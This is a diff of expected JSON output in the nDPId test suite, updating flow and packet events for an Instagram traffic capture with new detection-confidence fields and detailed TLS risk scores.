 02373{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1436720950911,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"ts_msec":1436720950911,"pkt":"QPMIw47hABsv8H60CABFAAWqgMpAAFYGaDMfDVY0wKgAZwBQ42ig4vyQLhm0z4AYADulrQAAAQEIChPCQpYAA\/8JIuSEmFKcHvUO79IuA4AtgLK1ooHfe\/xvCx6EanjcjDye5qfYfg99btIFMlfpEyS0+WXx48YQQIBKyWOQayb5WbhMWSz8Ru7MV\/a5RJtywzl84iv9BLl6PdqXz3kxPZm4yY8HdjILE3vdfyWVN0pVFaKK+f+Osc32N80bLx0naY6\/StT9w4Neeouf2Tn\/vkhhHb5a5vAV9Sx5efQ\/Fatqq174n5ea7v9ir3vf4yK3Pnlx3v3fywdfv\/ld3jdWI6CQY9xByO962aeABxBaD0Ff8vq65YOluUkGW\/xG5p7nyyq1NumgVeaWXPx2O3qpBCTyam4Mj9KNa9CLu77T788mzfZZLswHVfevJGWxpG6er55a4je67Jde+KzsbHfq771q7M2+z\/WWJw+2E3Gv8+Ffd+tBC77nzd2bXmu\/clj6qf9o8rFbG7XiKrvvv6XxVyXfvsflY+OxHlh7gk3Z3+CHdjx7fieVi8bxm781fQKvN8eNlagx6Pt3\/NOSAfXLBsZ085Sli5c\/HVLg4fEITYcZuYfT1VtMLoUR\/it2aocyhvwSZMTvD5t065r2N7JUsZycS8vq283r4S3bSl8\/xBhG2Ci5YyWnWnN8pxV7z+JfURJd7rip6XefL+Ju6T2Uxe8n5uUueW8j7FWxyhWWeGt2YWoIb6BgT6P7uCHnx\/HwXcNPzZiXBYPY6liIwioP5BO9O7zdXvrl6Ju71WJu93dF9e+W764JLl\/1aJkh+a8yX4S4lMe7dI+73eX7WiDQUaZve75ZfLkLUJX2tpOX0s4hxEi8nbq2h\/\/mvflq9RBfYRrfTdMUcVv5e78i9rwQyT\/Sl\/1zQY9T8g\/Uty51S6PL8o6JLB8VrQkT8ugJnmu83Eyez2e5Qy1+W7Aw4JHINbEb3Lj395YP7YvjhcMBXfvXJ44Z+Ixmnuj5fXvqryZ8aIvNfJRrTESolEZ4VaoKtE96vFFfwld9u321frxC3vvk10K23e7KuXiuSPeX78kEfFYr7eXpJxFpezOY6TshceqnnmzDJNaHyWEjeK+xtg7siFQxNUarW6raVTT\/fwlt3m1+qIhVuJsRCxFdbFXtQf9\/RdIuTCv1R7IUVly5mtgVW\/5h5d378ta7e\/5QkWm71LXLL\/Y\/yuCATBPFbu75ZM1tF4Xr2urFPeZ1jp6PYqu0ysRtkUSKOnvSvJ9F0HEq\/Rr4RDbTxd+7uU\/Q0X5NSa4riJq7\/YqaIUW4dNr2MWX30vRqr09mqvna6y\/VdiohYPHuWzpM\/5V791hHspd591pkzSvTJiOetcEmlGTx05fm5r+E5WPIYg3+Ld5OiDJCb38Xd9ysF92RKCKwntddXfaT3LP\/4K7yaDr4HbV6D7vh8Ru7u\/ShH0gWZxKK93e\/u7nhshKX\/8u99ZHz6WcFOZh7FbiudjfLamk58fUJd3H2j6sTr\/E4xQhYhPxokXSHH53b6EIn4I8kGvoiAAQAAAAAAACAYAavAAAAAgECXIEAAAAAAAAAAAAAAAACAAWcAAAAZwAAAAUAAQABAAAAAIBgBrAAAAACAQJcAQAAAAAAAAAAAAAAAAIABZwAAABnAAAFoQABAAEAAAAAgGAGsQAAAAIBAlwBAAAAAAAAAAAAAAAAAgAFnAAAAGcAAAs9AAEAAQAAAACA4AayAAAAAgECXEEAAAAAAAAAAAAAAAACAAFNAAAAZwAAENkAAQABARggBwEYIAcAABVgQZrjwgqFiDcfxdYWFjNTGhc\/+kWorCzCP06aQacK5fU3p2bDv4QjGkzRtJEnNbVPk\/10ykQi0ZJ4s6VFQ2Ko59C0bD2u1KUtTyS\/\/DlRe1HhoMlOd6CAkkRYQkwPPOx2Ho6SCe9GzaPNROS+"}
-00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":572,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720950909,"flow_last_seen":1436720950923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":29358,"flow_avg_l4_payload_len":917,"midstream":1,"ts_msec":1436720950923,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {}}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720950909,"flow_last_seen":1436720950923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":29358,"flow_avg_l4_payload_len":917,"midstream":1,"ts_msec":1436720950923,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {}}
+00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":572,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720950909,"flow_last_seen":1436720950923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":29358,"flow_avg_l4_payload_len":917,"midstream":1,"ts_msec":1436720950923,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {}}
+00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720950909,"flow_last_seen":1436720950923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":29358,"flow_avg_l4_payload_len":917,"midstream":1,"ts_msec":1436720950923,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952553,"flow_last_seen":1436720952553,"flow_idle_time":7440000,"flow_min_l4_payload_len":1418,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1418,"flow_avg_l4_payload_len":1418,"midstream":1,"ts_msec":1436720952553,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 02375{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1436720952553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"ts_msec":1436720952553,"pkt":"QPMIw47hABsv8H60CABFAAW+RXVAADMGTWwCFuwzwKgAZwBQrHcqB5rC6nVWeIAQAeYA6gAAAQEICmBlKDgAA\/+vNN9ULewTHBOFuxeelHDOvSnlSV1MyHTuCPSU99J+Rb8TuXzL6L8kVMT9JeX\/AEeHJMKvc8yfZQDY5nhAsWaIx3cLbY2ubZRDNurbaUASgAZ45AKigq45hruCoLni5pLmg59eiPd\/MiN87txVNMyFgkWsWfkcvPvLq3ncGqOJteWDTNpm8JnDNe\/V0S2KHy+GaSkVk8YYmWOQdL4xuwexnBqduXqVc8IuuI9MY+Zt8cnTPcsfLLIlpNfPzE+aRdsInsLztgb98N0mNzOHWHNTZrWKQPr9F5EE8pK7KRl773oe+7TTr1byuTp17xSTo5toqt17OaKtyATyBsMufY15yTPDfHSZYsAADIDSioIAAAHiqKF1TXzn1tX21U6idxttVoiynCqd8u3uesClb\/XTWQXOtPYUXP50lMJRzX9QM7C64zEeROD4ZaaRjli0mWIjfY1adjPenj65KGzqNXJTVghI+6I9UuSYsusH3FlxFno1c9JW3qbWRHfo32lBRAAGeChkqKC5IoYXnRl6Z3L5dCnLn26mSNOSOlqcea5o+UReR652+3d2\/Dab0zb9PXGqPSSLVDbNYRN6MtmpYbJEJLFdJ2RaURdiZY5h0OrU5h7IeY888nVsXnwm4oxv7JWfA68vLc8ehxYrmuOvDGouaBzaCTVP8+zXrnlnrxCWO9ezKKfpVjom7FpO6KTzNl60JdWhqz19c1yubV3UpRimqVV2W9Iuz4HPYBS04ZbGvOuvLXvjiZYsyxAFADSAAAIAHiqKCLcMvDzel9taKZLs5gp0t2Sh58L9ypUAXrhU0aeiss785JfFQgziXCyntnoKqRxzXlrlhljpCKihlu1P7THj6681RUYywmYQzKyhFbllawrlLFUK21TYahBMm4bB0c\/Q0qorQAApkAqZAqooYd7fNpcf2zJkmmfqN4IOKohvY2dlqWGThFbWF\/iVS78WnnJ2uDHuZI98fVGcac2Zm9mcm1UZY5ht7uDaF69Ec7stO3DjzT4G5waWu1vkbTUs3N04NR5d+uk9NE0xVVXqfWMDHPBz3TyJ2pj1SeiHvpcNbNaNfVk2d++zGVKltAVHjbncFMYehMEedktrQOr+f0lWrmtUm+5kDyFpIAAACABpAAAEADxUAvSVxiQ0ufh6dafDwdvPJvem8y03645umpEvJ0dXO8bOVZrlo6+6HRHb0ou72TKnrj5KPN7\/AOgKGio1hlhcLnqyF3+tvLXsSbkfin2t4tioTO4NYFQ\/cjnql8XXv1hza9+0Ud7jZRwM7yzJxDp5um5UBpRFBRFDJUAyXHIMLhp62c7n0OsJjy0iGfHrFKd3PzhU8hjD\/pFzODc\/Y6udSW9S1xmy97TUsc6rydtdS82Etsi8jjdrKKSuKgmeOTOnu4nJHsh6YHzk6+ZUwTisdkMdqJMzvOrXOshOkK636OrSLZYJJHZcArm2apudeK4tWc27cstemRx+TikdR37SEPju+kLssw2Gc1wOvJ2hIdaYk1zq07Iu2KUuuldIaeHl165wzJM2tQDAAEFA0ACABgAIKiLtm1f2FaZdGxIrg19HJLzj8n4Ypnc+B3T5H9i6KUpcY+86xxUVeVESMl8UPe1Kc82\/VTk3j\/1J5ak58ckqUUUN\/rfyR6eHcXir2n4sx0h9l1nO6iWmGyLxxNiNJu0g3Ybk0hqbHRqCIdPN0XOQitAAKqALljkCrjkGF2Uncud2zD5hCufWAuzR3tSLQmaqnX6OSXbK53hgkuOsgpG7qQpZRqSR+oidlVpZdTrxXdIxxKXxG1ojMpizEzxzZ0OrW7I9gvrG+cnXo1beEccjsojNZyrk6C5qrW4NVKD9vH1VFwxWVxccbqS2Yg5iCSbQN4k01rSK6ZNFZW1N6VuWn84="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1436720952553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720952553,"pkt":"ABsv8H60QPMIw47hCABFAAA0quZAAEAG4ITAqABnAhbsM6x3AFDqdVZ4KgegTIAQAtavfwAAAQEICgAD\/7RgZSg4"}
@@ -146,59 +148,59 @@
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAAA0AuFAAEAGAhTAqABnLiFGn+VCAbsSlgNc2Tfr4YARA4k19gAAAQEICgAD\/7VWGIoU"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1436720952563,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1436720952563,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1436720952563,"pkt":"ABsv8H60QPMIw47hCABFAABH\/7VAAEARadHAqABnCAgICGn0ADUAM87BrqQBAAABAAAAAAAACHBob3Rvcy1iAmFrCWluc3RhZ3JhbQNjb20AAAEAAQ=="}
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1436720952563,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"photos-b.ak.instagram.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00620{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1436720952563,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"photos-b.ak.instagram.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1436720952611,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1436720952611,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC\/YuIUaWwKgAZwBQn5dVkK9h7WtuhaASOJDXwwAAAgQFlgQCCAoJIvhRAAP\/swEDAwU="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720952611,"pkt":"ABsv8H60QPMIw47hCABFAAA0kThAAEAGc8XAqABnLiFGlp+XAFDta26FVZCvYoAQAOU17QAAAQEICgAD\/7oJIvhR"}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908576,"flow_last_seen":1436720908733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908577,"flow_last_seen":1436720908737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1436720900687,"flow_last_seen":1436720901200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":46392,"flow_avg_l4_payload_len":799,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908576,"flow_last_seen":1436720908733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908577,"flow_last_seen":1436720908737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1436720900687,"flow_last_seen":1436720901200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":46392,"flow_avg_l4_payload_len":799,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1436720900692,"flow_last_seen":1436720900876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3517,"flow_avg_l4_payload_len":502,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00611{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
